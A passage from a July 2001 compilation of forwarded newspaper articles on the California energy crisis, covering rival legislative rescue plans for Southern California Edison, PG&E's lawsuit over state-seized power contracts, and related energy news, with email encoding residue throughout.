transmission lines for $2.76 billion has attracted little support.=20_x000D_
The question now is whether legislators will accept a modified version of t=_x000D_
he=20_x000D_
governor's deal, will approve an entirely different rescue plan, or will=20_x000D_
simply let Edison join Pacific Gas and Electric Co. in bankruptcy court.=20_x000D_
"We're encouraged that at least there's activity and people are grappling=_x000D_
=20_x000D_
with the issues," said John Fielder, an Edison senior vice president.=20_x000D_
The Assembly's energy committee heard testimony on two of the competing=20_x000D_
proposals Tuesday. The Senate's energy committee will take up the third pla=_x000D_
n=20_x000D_
today.=20_x000D_
The issue conceivably could be decided this week, since legislators are=20_x000D_
scheduled to begin their summer recess Friday.=20_x000D_
Of the three proposals under consideration, one would authorize state=20_x000D_
purchase of Edison's transmission lines, one would provide an option to buy=_x000D_
,=20_x000D_
and one would simply tally Edison's debts and charge ratepayers to pay them=_x000D_
=20_x000D_
off.=20_x000D_
Some legislators favor doing nothing at all and letting a bankruptcy judge=_x000D_
=20_x000D_
decide Edison's fate.=20_x000D_
Steve Maviglio, a spokesman for Davis, said the Democratic governor support=_x000D_
s=20_x000D_
anything that "comes close" to the tentative deal, hammered out in April, t=_x000D_
o=20_x000D_
buy Edison's transmission lines.=20_x000D_
Assemblyman Fred Keeley, D-Boulder Creek, and Assembly Speaker Robert=20_x000D_
Hertzberg, D-Sherman Oaks, have proposed a rescue plan that would buy the=_x000D_
=20_x000D_
lines at a lower price -- $2.4 billion -- and would modify the governor's=_x000D_
=20_x000D_
plan substantially.=20_x000D_
Key elements of the bill would allow the state to buy Edison's hydroelectri=_x000D_
c=20_x000D_
assets if the transmission-line sale falls through, allow businesses to=20_x000D_
contract with private suppliers for electricity in 2003, and commit the sta=_x000D_
te=20_x000D_
to paying only 70 cents of every dollar owed by Edison to power generators.=_x000D_
=20_x000D_
The deal also would provide California with ownership or conservation=20_x000D_
easements to more than 20,000 acres of land, and would require Edison to=20_x000D_
increase its supply of alternative energy -- such as wind or solar. The=20_x000D_
proposal is not expected to spark new rate hikes, Keeley said.=20_x000D_
The Senate plan, like the Keeley-Hertzberg proposal, would require large an=_x000D_
d=20_x000D_
medium businesses to pay down much of Edison's debts.=20_x000D_
The Senate plan dedicates up to $2.5 billion in large-user rates for debts=_x000D_
=20_x000D_
involving banks and renewable energy sources known as "qualifying=20_x000D_
facilities."=20_x000D_
The plan, written by Sen. Byron Sher, D-Palo Alto, seeks to leave Edison wi=_x000D_
th=20_x000D_
$1 billion in debt from generators and marketers for the utility to work ou=_x000D_
t=20_x000D_
on its own.=20_x000D_
The Senate plan would give the state a five-year option to buy Edison=20_x000D_
transmission lines for book value -- about $1.2 billion.=20_x000D_
Rather than provide conservation easements, the plan calls for Edison's=20_x000D_
environmentally sensitive acreage to be acquired by the state or a trust.=_x000D_
=20_x000D_
Remaining parts of the proposal are similar to the governor's deal.=20_x000D_
A third proposal, pushed by several lawmakers, seeks to eliminate debt for=_x000D_
=20_x000D_
Edison and PG&amp;E. It would not involve transmission lines, conservation=20_x000D_
easements or other such elements.=20_x000D_
Advocates say Edison's debt stemmed largely from failed state regulatory=20_x000D_
policies, so the state should simply charge consumers a monthly fee to pay =_x000D_
it=20_x000D_
off.=20_x000D_
"This is a straight bailout -- no hidden balls, no extras," said Assemblyma=_x000D_
n=20_x000D_
Rod Wright, D-Los Angeles.=20_x000D_
It is not yet known whether that monthly fee could fit within the existing=_x000D_
=20_x000D_
rate structure. For home=0F'owners, the amount is estimated at $4 in the PG=_x000D_
&amp;E=20_x000D_
service area and $2 within Edison's boundaries.=20_x000D_
Consumer groups are wary of the Edison rescue proposals, fearing the state=_x000D_
=20_x000D_
will ultimately promise too much and get too little.=20_x000D_
"When a supermarket and dairy farmer both are forced to pay a 10-year bailo=_x000D_
ut=20_x000D_
tax, the consumer pays more for milk," said Doug Heller of the Foundation f=_x000D_
or=20_x000D_
Taxpayer and Consumer Rights.=20_x000D_
_x000D_
_x000D_
The Bee's Jim Sanders can be reached at (916) 326-5538 or jsanders@sacbee.c=_x000D_
om=20_x000D_
&lt;mailto:jsanders@sacbee.com&gt;.=20_x000D_
Kevin Yamamura of The Bee Capitol Bureau contributed to this report._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PG&amp;E sues state over seizure of long-term power contracts=20_x000D_
By Dale Kasler_x000D_
Bee Staff Writer_x000D_
(Published July 18, 2001)=20_x000D_
Reopening an old wound in California's energy crisis, Pacific Gas and=20_x000D_
Electric Co. has sued the state over a group of low-cost energy contracts=_x000D_
=20_x000D_
seized almost six months ago by Gov. Gray Davis.=20_x000D_
The lawsuit, filed Monday in San Francisco Superior Court, stems from the=_x000D_
=20_x000D_
collapse of the California Power Exchange and the state's entry into the=20_x000D_
power-buying business in January.=20_x000D_
PG&amp;E and Southern California Edison had entered into a series of long-term=_x000D_
=20_x000D_
purchase contracts through the exchange, a now-defunct market for buying an=_x000D_
d=20_x000D_
selling electricity. But as both utilities collapsed financially and the=20_x000D_
Power Exchange was clinging to life, the exchange seized the contracts and=_x000D_
=20_x000D_
was about to auction them off for nonpayment of bills.=20_x000D_
That's when Davis stepped in. Using his emergency powers, the governor=20_x000D_
grabbed control of the contracts, saying he didn't want them resold at=20_x000D_
inflated prices.=20_x000D_
At the time, the exchange said the contracts were worth about $1 billion,=_x000D_
=20_x000D_
with PG&amp;E's share set at $348 million.=20_x000D_
But it's likely their value has fallen along with the spot market price of=_x000D_
=20_x000D_
electricity. Back when the governor seized them, PG&amp;E's contracts were for=_x000D_
=20_x000D_
$60 to $130 a megawatt-hour. That was a bargain at the time, and made the=_x000D_
=20_x000D_
contracts very valuable. Now that spot prices have plunged, those contracts=_x000D_
=20_x000D_
are no longer such a great deal.=20_x000D_
PG&amp;E's lawsuit didn't put a value on the contracts. Nevertheless, "the stat=_x000D_
e=20_x000D_
has benefited from the contracts," said PG&amp;E spokesman Ron Low. "We should =_x000D_
be=20_x000D_
compensated."=20_x000D_
The state had planned to pay for the contracts, at a price to be determined=_x000D_
=20_x000D_
by a state government claims board, said Davis' spokesman Steve Maviglio. B=_x000D_
ut=20_x000D_
he said the state also expected to be taken to court over the issue.=20_x000D_
"We always thought we'd be fighting it out in a neutral forum," Maviglio=20_x000D_
said. "This comes as no surprise."=20_x000D_
_x000D_
_x000D_
The Bee's Dale Kasler can be reached at (916) 321-1066 or dkasler@sacbee.co=_x000D_
m=20_x000D_
&lt;mailto:dkasler@sacbee.com&gt;._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Energy Digest: Advocate attacks utility rescue plan_x000D_
_x000D_
_x000D_
(Published July 18, 2001)=20_x000D_
The state's consumer advocate criticized Gov. Gray Davis' proposed rescue=_x000D_
=20_x000D_
plan for San Diego Gas &amp; Electric on Tuesday, calling it too generous to th=_x000D_
e=20_x000D_
utility's shareholders.=20_x000D_
The Public Utilities Commission's Office of Ratepayer Advocates called the=_x000D_
=20_x000D_
proposed deal with SDG&amp;E and its parent company, Sempra Energy, "clearly=20_x000D_
excessive."=20_x000D_
The advocate said the state goes too far in the core element of the rescue=_x000D_
=20_x000D_
plan -- the $1 billion state purchase of SDG&amp;E's transmission lines. The=20_x000D_
advocate said the money would be better spent building or buying new=20_x000D_
generating plants.=20_x000D_
The plan must be approved by the Legislature and PUC. A similar plan, to bu=_x000D_
y=20_x000D_
Southern California Edison's transmission lines, has run into numerous=20_x000D_
roadblocks in the Legislature.=20_x000D_
--Dale Kasler_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hour of decision: Who will pay for costly power of past, future?_x000D_
_x000D_
_x000D_
(Published July 18, 2001)=20_x000D_
_x000D_
In the next few days, state lawmakers and regulators must make some=20_x000D_
unsettling choices about how to share the financial burdens of California's=_x000D_
=20_x000D_
electricity debacle.=20_x000D_
Looking backward, they will decide how -- or whether -- to erase $3.5 billi=_x000D_
on=20_x000D_
in debts run up last year by Southern California Edison, when it bought=20_x000D_
pricey power but couldn't pass the costs on to consumers. Looking ahead, th=_x000D_
ey=20_x000D_
will choose who, if anybody, will get out of paying for expensive power=20_x000D_
purchased by the state since the utilities ran out of cash last January.=20_x000D_
In both cases, the principle guiding the decision ought to be the same: No=_x000D_
=20_x000D_
one is blameless in getting California into this mess, and no group can=20_x000D_
escape the pain of getting out of it.=20_x000D_
Democratic lawmakers in the Assembly are searching in vain for ways to hide=_x000D_
=20_x000D_
the real costs from voters. Their idea is to have the large users of power=_x000D_
=20_x000D_
(mostly big businesses) pay off Edison's past debts. In return, businesses=_x000D_
=20_x000D_
would get some freedom to shop for cheaper power deals in the future.=20_x000D_
The problem is that there won't be much opportunity to shop in the coming=_x000D_
=20_x000D_
years. That's because Gov. Gray Davis went out at the very peak of the mark=_x000D_
et=20_x000D_
and bought up most of the state's future electricity supply before it went =_x000D_
on=20_x000D_
sale. The strategy of locking most of California's power demand into=20_x000D_
long-term contracts seemed ill-advised at the time, even more so now.=20_x000D_
Now that the governor has done all this shopping, the Public Utilities=20_x000D_
Commission must assure that electric customers will pay for all that=20_x000D_
electricity -- $43 billion worth of power over the next decade or so. In=20_x000D_
addition, the PUC must commit customers to repaying the state for the power=_x000D_
=20_x000D_
it has already purchased this year -- many billions on top of that. The sta=_x000D_
te=20_x000D_
borrowed from itself to buy all this power, and is banking on a bond sale t=_x000D_
o=20_x000D_
pay off this debt. Unless a portion of the rate customers pay is dedicated =_x000D_
to=20_x000D_
repaying those bonds, they can't be sold.=20_x000D_
This web of regulation, contracts and finance is so complex, so huge, it's=_x000D_
=20_x000D_
hard to see how the energy leaders in a few days will find a graceful, fair=_x000D_
=20_x000D_
solution. But for a political compromise to work, all the interests involve=_x000D_
d=20_x000D_
must take some pain.=20_x000D_
Southern California Edison must swallow some of its debt. Power generators=_x000D_
=20_x000D_
and the state must renegotiate some of their long-term contracts so that th=_x000D_
e=20_x000D_
generators give back some of the bounty they reaped by market manipulation.=_x000D_
=20_x000D_
And no consumer, big or small, should be allowed to avoid paying the true=_x000D_
=20_x000D_
costs of the power they use. In this reckoning, there's no easy way out for=_x000D_
=20_x000D_
anyone -- and especially not for the elected officials who must deliver the=_x000D_
=20_x000D_
bad news._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Utility sues state seeking millions in seized power contracts =20_x000D_
_x000D_
_x000D_
\_x000D_
objattph=20_x000D_
By David Kravets ASSOCIATED PRESS  July 17, 2001  SAN FRANCISCO =01)=20_x000D_
California's largest utility sued the state Tuesday seeking reimbursement o=_x000D_
f=20_x000D_
millions of dollars in energy contracts the governor seized Jan. 31.  San=_x000D_
=20_x000D_
Francisco-based Pacific Gas &amp; Electric Co. said it "has received no=20_x000D_
compensation for the damage to its property," according to a suit filed in=_x000D_
=20_x000D_
San Francisco Superior Court.  The suit came as PG&amp;E, which filed for=20_x000D_
bankruptcy protection in April, struggles to repay $14.4 billion in debt to=_x000D_
=20_x000D_
thousands of creditors.  Invoking constitutionally vested powers, Gov. Gray=_x000D_
=20_x000D_
Davis seized the energy contracts to keep the California Power Exchange fro=_x000D_
m=20_x000D_
liquidating them. The now-defunct exchange, which was the state's middleman=_x000D_
=20_x000D_
for the buying and selling of power, wanted the contracts for itself to=20_x000D_
recoup hundreds of millions in unpaid power buys that PG&amp;E owed it.  The=20_x000D_
governor's office acknowledged that California owes PG&amp;E for the contracts,=_x000D_
=20_x000D_
an amount that Davis wants a judge to determine. At the time they were=20_x000D_
seized, the state estimated their value at $160 million, while the power=20_x000D_
exchange priced them at $347 million.  "We seized the contracts to have=20_x000D_
reasonable priced power and expected that price to be set in a neutral=20_x000D_
forum," said Steve Maviglio, the governor's spokesman.  It's not easy to=20_x000D_
determine their value. Using the contracts, the state buys electricity at a=_x000D_
=20_x000D_
set price, and can avoid the sky-high prices it has to pay for power bought=_x000D_
=20_x000D_
at the last minute. Therefore, the contracts' value changes with the volati=_x000D_
le=20_x000D_
price of electricity.  "We believe the state has benefited from the value o=_x000D_
f=20_x000D_
our contracts, and as a result we should be compensated," PG&amp;E spokesman Ro=_x000D_
n=20_x000D_
Low said.  Low declined to place a value on the contracts.  The contracts i=_x000D_
n=20_x000D_
question, which the state is now using to buy electricity because the=20_x000D_
utility's bad credit rating restricts it from buying its own, promise power=_x000D_
=20_x000D_
at rates below those being charged today by power generating companies. =20_x000D_
Because of the shaky financial pictures of PG&amp;E, Southern California Edison=_x000D_
=20_x000D_
Co. and San Diego Gas &amp; Electric Co., the state in January began buying muc=_x000D_
h=20_x000D_
of the electricity to supply the ratepayers of those utilities.  The power =_x000D_
is=20_x000D_
sold to ratepayers through the utilities, which reimburse the state through=_x000D_
=20_x000D_
consumers' bills. But, because of energy pricing rules that prompted the=20_x000D_
utilities' unstable financial footing, current rates are not enough to repa=_x000D_
y=20_x000D_
the state. To recoup its losses, the state is expected to sell $8 billion o=_x000D_
r=20_x000D_
more in bonds to be repaid through increased consumer power rates.  Under=_x000D_
=20_x000D_
California's 1996 deregulation plan, the state's utilities sold many of the=_x000D_
ir=20_x000D_
power plants and were forced to buy electricity on the market through the=_x000D_
=20_x000D_
newly created power exchange.  As demand mushroomed and supplies became=20_x000D_
scarce, the utilities began paying substantially more for electricity than=_x000D_
=20_x000D_
deregulation rules allowed them to collect from consumers.  The case is PG&amp;=_x000D_
E=20_x000D_
v. California, 322921.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PG&amp;E Sues State Over Contracts_x000D_
From Bloomberg News_x000D_
_x000D_
July 18 2001_x000D_
_x000D_
SAN FRANCISCO -- PG&amp;E Corp.'s Pacific Gas &amp; Electric Co. utility sued=20_x000D_
California on Tuesday, saying it wants to be paid for the wholesale=20_x000D_
electricity contracts the state seized in January._x000D_
_x000D_
Gov. Gray Davis took away Pacific Gas' 12-month forward contracts to ensure=_x000D_
 a=20_x000D_
sufficient and continuous supply of electricity for the state. At the time,=_x000D_
=20_x000D_
California estimated the contracts were worth $150 million._x000D_
_x000D_
Pacific Gas claims the contracts had "significant value" because they allow=_x000D_
ed=20_x000D_
the utility to receive power for less than current market rates. "Although=_x000D_
=20_x000D_
PG&amp;E has demanded just compensation from the [state], PG&amp;E has received no=_x000D_
=20_x000D_
compensation for the damage to its property," the utility said in court=20_x000D_
papers filed Monday in San Francisco Superior Court._x000D_
_x000D_
The company, which filed for Chapter 11 protection in April, is seeking=20_x000D_
damages and attorney fees. The state claimed in January that the contracts=_x000D_
=20_x000D_
would have delivered enough electricity to power 100,000 to 500,000 homes f=_x000D_
or=20_x000D_
6 cents to 13 cents per kilowatt-hour._x000D_
_x000D_
Officials in the governor's office did not immediately return calls seeking=_x000D_
=20_x000D_
comment.=20_x000D_
Copyright 2001, Los Angeles Times &lt;http://www.latimes.com&gt;=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Consumer prices up as energy costs moderate=20_x000D_
LEIGH STROPE, Associated Press Writer_x000D_
Wednesday, July 18, 2001=20_x000D_
,2001 Associated Press=20_x000D_
URL:=20_x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=3D/news/archive/2001/07/18/=_x000D_
finan_x000D_
cial0837EDT0023.DTL&gt;_x000D_
(07-18) 05:37 PDT WASHINGTON (AP) --=20_x000D_
Consumer inflation edged up last month as electricity prices continued to=_x000D_
=20_x000D_
surge, while the cost of gasoline and other energy products retreated.=20_x000D_
The Labor Department reported Wednesday that the Consumer Price Index, the=_x000D_
=20_x000D_
government's most closely watched inflation measure, climbed by a seasonall=_x000D_
y=20_x000D_
adjusted 0.2 percent in June. The index was up 3.8 percent for the year.=20_x000D_
The new reading on consumer prices matched analysts' expectations.=20_x000D_
The "core" rate of inflation, which excludes volatile energy and food price=_x000D_
s,=20_x000D_
rose 0.3 percent in June compared with just 0.1 percent in May.=20_x000D_
,2001 Associated Press=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Contra Costa may upgrade 9 buildings=20_x000D_
$1.7 million earmarked for conservation=20_x000D_
Jason B. Johnson, Chronicle Staff Writer &lt;mailto:jbjohnson@sfchronicle.com&gt;_x000D_
Wednesday, July 18, 2001=20_x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt;=20_x000D_
URL:=20_x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=3D/chronicle/archive/2001/0=_x000D_
7/18/_x000D_
MNC199898.DTL&gt;_x000D_
Contra Costa will spend as much as $1.7 million to conserve energy at the=_x000D_
=20_x000D_
county's nine worst "energy hog" buildings under a proposal approved=20_x000D_
yesterday by the Board of Supervisors.=20_x000D_
The measure is part of a larger effort the board in March agreed to underta=_x000D_
ke=20_x000D_
to reduce the county's energy use by up to 10 percent.=20_x000D_
A private company will install upgraded heating, ventilation and air=20_x000D_
conditioning control systems at the nine buildings, resulting in savings of=_x000D_
=20_x000D_
just under $200,000 a year.=20_x000D_
"What we've done is pick our energy hogs," said Bart Gilbert, the county's=_x000D_
=20_x000D_
general services director. "To start the process of making our buildings mo=_x000D_
re=20_x000D_
energy efficient."=20_x000D_
County officials had no difficulty in identifying the hogs, which tended to=_x000D_
=20_x000D_
be large buildings that serve a variety of uses and are open as much as 24-=_x000D_
=20_x000D_
hours a day, seven days a week, said Gilbert.=20_x000D_
Eight of the buildings are in Martinez, the county seat, and one is in=20_x000D_
Antioch. They include the Bray Courts building in downtown Martinez,=20_x000D_
sheriff's offices and morgue, and the Employment and Human Services buildin=_x000D_
g=20_x000D_
in Antioch.=20_x000D_
One energy waster is the 120,000-square-foot Summit Center, an office=20_x000D_
building on Arnold Drive in Martinez that the county acquired last year.=20_x000D_
The building's cooling system activates at a particular setting -- 76=20_x000D_
degrees. So it shuts down completely when the temperature reaches below tha=_x000D_
t=20_x000D_
setting and won't turn on until it reaches about 79 degrees.=20_x000D_
But new digital technology controls allow the system to gradually reduce or=_x000D_
=20_x000D_
increase power without having to shut down, which saves energy.=20_x000D_
"When you turn the system on everything doesn't kick in, everything doesn't=_x000D_
=20_x000D_
come on full speed," said Gilbert. "That's a tremendous savings."=20_x000D_
The county will contract with Syserco Inc. of Fremont to install the new=20_x000D_
control systems from July through June 30, 2002.=20_x000D_
County officials believe that the plan will reduce demand by 700,000 kilowa=_x000D_
tt=20_x000D_
hours and pay for itself in about five years by reducing energy costs.=20_x000D_
The county has applied for a low-interest loan from the state's Energy=20_x000D_
Department that would cover about half the plan's costs. It is one of sever=_x000D_
al=20_x000D_
Bay Area communities seeking such loans during the energy crisis.=20_x000D_
In the past two months, state officials have received $50 million worth of=_x000D_
=20_x000D_
new loan applications from city and county governments.=20_x000D_
Before the energy crisis, the department would average between $5 and 10=20_x000D_
million in loan applications, said Virginia Lew, project manager for the=20_x000D_
department's Energy Partnership Program.=20_x000D_
San Francisco is set to receive $5 million in loans for replacing inefficie=_x000D_
nt=20_x000D_
lighting at San Francisco General Hospital and city traffic signals.=20_x000D_
Solano County will receive $1.1 million for lighting and efficiency project=_x000D_
s=20_x000D_
similar to those in Contra Costa, while Santa Rosa was given $1.5 million f=_x000D_
or=20_x000D_
water and wastewater treatment facility upgrades.=20_x000D_
Oakland officials are awaiting approval of the city's application for about=_x000D_
=20_x000D_
$400,000 for a combination of lighting and ventilation efficiency projects.=_x000D_
=20_x000D_
e-mail Jason B. Johnson at jbjohnson@sfchronicle.com=20_x000D_
&lt;mailto:jbjohnson@sfchronicle.com&gt;.=20_x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt; Page A - 17=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lawmakers devise rival bailout plans for Edison=20_x000D_
Push to come up with alternative to bankruptcy before recess=20_x000D_
Lynda Gledhill, Chronicle Sacramento Bureau &lt;mailto:lgledhill@sfchronicle.c=_x000D_
om&gt;_x000D_
Wednesday, July 18, 2001=20_x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt;=20_x000D_
URL:=20_x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=3D/chronicle/archive/2001/0=_x000D_
7/18/_x000D_
MN76320.DTL&gt;_x000D_
Sacramento -- Lawmakers are struggling this week to agree on a plan to keep=_x000D_
=20_x000D_
Southern California Edison from declaring bankruptcy as they rush to comple=_x000D_
te=20_x000D_
business before Friday's scheduled summer recess.=20_x000D_
After months of talking about a solution and dismissing one agreed to by=20_x000D_
Edison and Gov. Gray Davis, lawmakers now have several competing proposals =_x000D_
to=20_x000D_
consider.=20_x000D_
A plan introduced last week by Assembly Speaker Robert Hertzberg, D-Sherman=_x000D_
=20_x000D_
Oaks (Los Angeles County), was debated for several hours yesterday, along=_x000D_
=20_x000D_
with a GOP-backed alternative by Assemblyman Roderick Wright, D-Los Angeles=_x000D_
.=20_x000D_
The two plans, which are scheduled for votes today in the Assembly Energy=_x000D_
=20_x000D_
Costs and Availability Committee, take sharply different approaches:=20_x000D_
-- Hertzberg's plan would pay $2.4 billion for Edison's transmission lines =_x000D_
to=20_x000D_
help cover the utility's estimated $3.5 billion debt. The utility would be=_x000D_
=20_x000D_
allowed to pay off its remaining debt by issuing bonds.=20_x000D_
The utility would repay the bonds using ratepayer money. For the first two=_x000D_
=20_x000D_
years, all customers would pay for the debt, but after that the largest use=_x000D_
rs=20_x000D_
would pay off the rest.=20_x000D_
-- Wright calls his plan a "straight bailout." It would allow the utility t=_x000D_
o=20_x000D_
issue bonds to cover all of its debt and impose a $2 a month rate increase=_x000D_
=20_x000D_
for all users until the debt is paid.=20_x000D_
The Senate also introduced its own plan. A bill by Sen. Byron Sher, D-Palo=_x000D_
=20_x000D_
Alto, would give the state a five-year option to buy the transmission lines=_x000D_
=20_x000D_
and would have the state back only $2.5 billion of the utility's debt.=20_x000D_
Since Davis announced a deal with Edison earlier this year, lawmakers,=20_x000D_
business groups and consumer advocates have all expressed reservations with=_x000D_
=20_x000D_
one aspect or another of it. Opposition has usually focused on the state=20_x000D_
purchase of Edison's transmission lines.=20_x000D_
The flurry of activity this week is an effort by lawmakers to take some kin=_x000D_
d=20_x000D_
of vote before they adjourn. The Edison agreement has an Aug. 15 deadline f=_x000D_
or=20_x000D_
approval by the Legislature.=20_x000D_
Brian Bennett, a spokesman for Edison, said creditors view that date as=20_x000D_
extremely important.=20_x000D_
"We're as close to bankruptcy as our creditors want us to be," he said. "Is=_x000D_
=20_x000D_
it a drop dead date? I don't know, but it is clearly an important date."=20_x000D_
Consumer groups have denounced Wright's plan, and at least one calls=20_x000D_
Hertzberg's proposal just another bailout and said it would cost California=_x000D_
ns=20_x000D_
$6.7 billion over the next 10 years.=20_x000D_
"We cannot be seduced by big businesses paying a bailout tax," said Doug=20_x000D_
Heller, a consumer advocate with the Foundation for Taxpayer and Consumer=_x000D_
=20_x000D_
Rights. "At the end of the day, we know businesses will pass these costs on=_x000D_
=20_x000D_
to the consumer."=20_x000D_
Included in the 76-page Hertzberg bill are provisions that would allow larg=_x000D_
e=20_x000D_
companies to buy their power directly from a provider instead of going=20_x000D_
through the utility after 2003.=20_x000D_
But a coalition of large business groups also said they are strongly oppose=_x000D_
d=20_x000D_
to the plan because it does not allow for immediate direct access.=20_x000D_
"Ultimately, we think our companies buying power for themselves is the best=_x000D_
=20_x000D_
solution," said Jack Stewart, president of the California Manufacturers and=_x000D_
=20_x000D_
Technology Association. "If businesses think there's a light at the end of=_x000D_
=20_x000D_
the tunnel where they see lower rates coming, they might tough it out and=_x000D_
=20_x000D_
stay."=20_x000D_
Wright argues that the beauty of his proposal is that it could easily apply=_x000D_
=20_x000D_
to the Pacific Gas and Electric Co. service area if the company wanted to u=_x000D_
se=20_x000D_
it as a way out of bankruptcy court. He estimates that PG&amp;E customers would=_x000D_
=20_x000D_
pay about $4 a month to help the company pay off its debt.=20_x000D_
"This is a straight bailout," Wright said. "This is not a hidden bill. Ther=_x000D_
e=20_x000D_
are extras."=20_x000D_
Wright said he believes his constituents would rather pay an extra $2 than =_x000D_
be=20_x000D_
unemployed because their business left the state due to high energy costs.=_x000D_
=20_x000D_
Business groups said the idea makes sense.=20_x000D_
"What good would it do to have your electricity bill reduced by $10 or $15=_x000D_
=20_x000D_
but not have a job?" said Bill Hauck, president of the California Business=_x000D_
=20_x000D_
Roundtable.=20_x000D_
Whatever plan is eventually authorized would be used to convince the PG&amp;E=_x000D_
=20_x000D_
bankruptcy judge to follow a similar model for that company, giving the sta=_x000D_
te=20_x000D_
those transmission lines as well.=20_x000D_
The purchase of the transmission lines has been at the center of Davis' pla=_x000D_
n.=20_x000D_
He argues that the purchase will give the state the ability to upgrade the=_x000D_
=20_x000D_
system, allowing a better flow of power between Northern and Southern=20_x000D_
California and a decreased chance of blackouts.=20_x000D_
But opponents argue that the state is getting one-third of a complicated=20_x000D_
system that will cost billions to upgrade and operate.=20_x000D_
"It's like buying a car with three wheels -- it is not going to get out of=_x000D_
=20_x000D_
the lot," consumer advocate Heller said.=20_x000D_
E-mail Lynda Gledhill at lgledhill@sfchronicle.com=20_x000D_
&lt;mailto:lgledhill@sfchronicle.com&gt;.=20_x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt; Page A - 14=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
News briefs on the California power crisis=20_x000D_
_x000D_
Wednesday, July 18, 2001=20_x000D_
,2001 Associated Press=20_x000D_
URL:=20_x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=3D/news/archive/2001/07/18/=_x000D_
state_x000D_
0913EDT0146.DTL&gt;_x000D_
(07-18) 06:13 PDT (AP) -- diuriegr1 ?By The Associated Press?SAN DIEGO (AP)=_x000D_
 -- County supervisors want to eliminate a $100 fee for ?installing solar p=_x000D_
ower systems to spur interest in the alternative energy ?source. ?Superviso=_x000D_
r Ron Roberts proposed waiving the fee at the board's Tuesday ?meeting. A n=_x000D_
ew ordinance may be ready for the supervisors' approval in two ?months. ?Th=_x000D_
e fee is charged to homeowners who live in the unincorporated areas of the =_x000D_
?county. Solar power systems for hot water heaters can cost about $4,000 an=_x000D_
d ?home units can cost about $26,000. ?The county has been issuing more per=_x000D_
mits for solar units this year and ?expects to issue 250 permits by Decembe=_x000D_
r. Two years ago, the county issued ?only 12. ?TEMECULA, Calif. (AP) -- An =_x000D_
Indian burial ground sits in the way of a ?proposed power-line route and tr=_x000D_
ibal members have asked U.S. Sen. Barbara ?Boxer to help preserve the site.=_x000D_
 ?Boxer, D-Calif., last week introduced an amendment to the Interior ?Appro=_x000D_
priations bill that would place more than 700 acres of land owned by the ?P=_x000D_
echanga tribe in a federal trust. If approved, the legislation would allow =_x000D_
?the tribe to bypass the procedure review by the Bureau of Indian Affairs. =_x000D_
?San Diego Gas &amp; Electric wants to run a 500,000-volt power line through th=_x000D_
e ?area. The $271 million route would run through southwestern Riverside Co=_x000D_
unty ?and link the utility's grid with one operated by Southern California =_x000D_
Edison. ?SDG&amp;E officials said the proposed federal legislation wouldn't der=_x000D_
ail the ?company's project. ?"I don't think it jeopardizes the project," sa=_x000D_
id SDG&amp;E spokeswoman Jacqueline ?Howells. "There are variations of our line=_x000D_
 that don't require that land, and ?there are alternatives further west." ?=_x000D_
The state's Public Utilities Commission must still approve the project. ?Th=_x000D_
e tribe recently purchased the site, which has one of the state's oldest ?o=_x000D_
ak trees. It is also home to several village sites and areas used for ?crem=_x000D_
ation. Tribal chairman Mark Macarro said the amendment wasn't ?specifically=_x000D_
 meant to block the power line project but rather to preserve the ?land fro=_x000D_
m development. ?,2001 Associated Press ???????State's largest utility sues =_x000D_
state seeking millions in power contracts seized ?by governor ?DAVID KRAVET=_x000D_
S, Associated Press Writer?Wednesday, July 18, 2001 ?,2001 Associated Press=_x000D_
 ?URL: ?&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=3D/news/archive/200=_x000D_
1/07/18/natio?nal0848EDT0542.DTL&gt;?(07-18) 05:48 PDT SAN FRANCISCO (AP) -- ?=_x000D_
California's largest utility has sued the state seeking reimbursement of ?m=_x000D_
illions of dollars in energy contracts seized by the governor. ?San Francis=_x000D_
co-based Pacific Gas &amp; Electric Co. "has received no compensation ?for the =_x000D_
damage to its property," the company said in a lawsuit filed Tuesday ?in Sa=_x000D_
n Francisco Superior Court. ?PG&amp;E filed for bankruptcy protection in April =_x000D_
and is struggling to repay ?$14.4 billion to thousands of creditors. ?Gov. =_x000D_
Gray Davis seized the energy contracts on Jan. 31 to keep the California ?P=_x000D_
ower Exchange from liquidating them. The now-defunct exchange, which had ?b=_x000D_
een the state's middleman for buying and selling power, wanted the contract=_x000D_
s ?to recoup hundreds of millions of dollars that PG&amp;E owed it. ?The govern=_x000D_
or's office acknowledged that California owes PG&amp;E for the ?contracts, an a=_x000D_
mount that Davis wants a judge to determine. At the time they ?were seized,=_x000D_
 the state estimated their value at $160 million, while the power ?exchange=_x000D_
 priced them at $347 million. ?"We seized the contracts to have reasonable =_x000D_
priced power and expected that ?price to be set in a neutral forum," said S=_x000D_
teve Maviglio, the governor's ?spokesman. ?Under the contracts, the state b=_x000D_
uys electricity at a set price rather than ?paying higher prices for power =_x000D_
bought at the last minute. Therefore, the ?contracts' value changes with th=_x000D_
e volatile price of electricity. ?"We believe the state has benefited from =_x000D_
the value of our contracts, and as a ?result we should be compensated," PG&amp;=_x000D_
E spokesman Ron Low said. ?Low declined to place a value on the contracts. =_x000D_
?,2001 Associated Press ?????Surplus state power sold at loss ?Posted at 11=_x000D_
:50 p.m. PDT Tuesday, July 17, 2001 ?BY JOHN WOOLFOLK ??Mercury News ???Sta=_x000D_
te officials who bought power contracts averaging $138 per megawatt-hour ?f=_x000D_
or this month are selling some of the power back for as little as $1 per ?m=_x000D_
egawatt-hour, traders say. ?After scrambling this spring for every megawatt=_x000D_
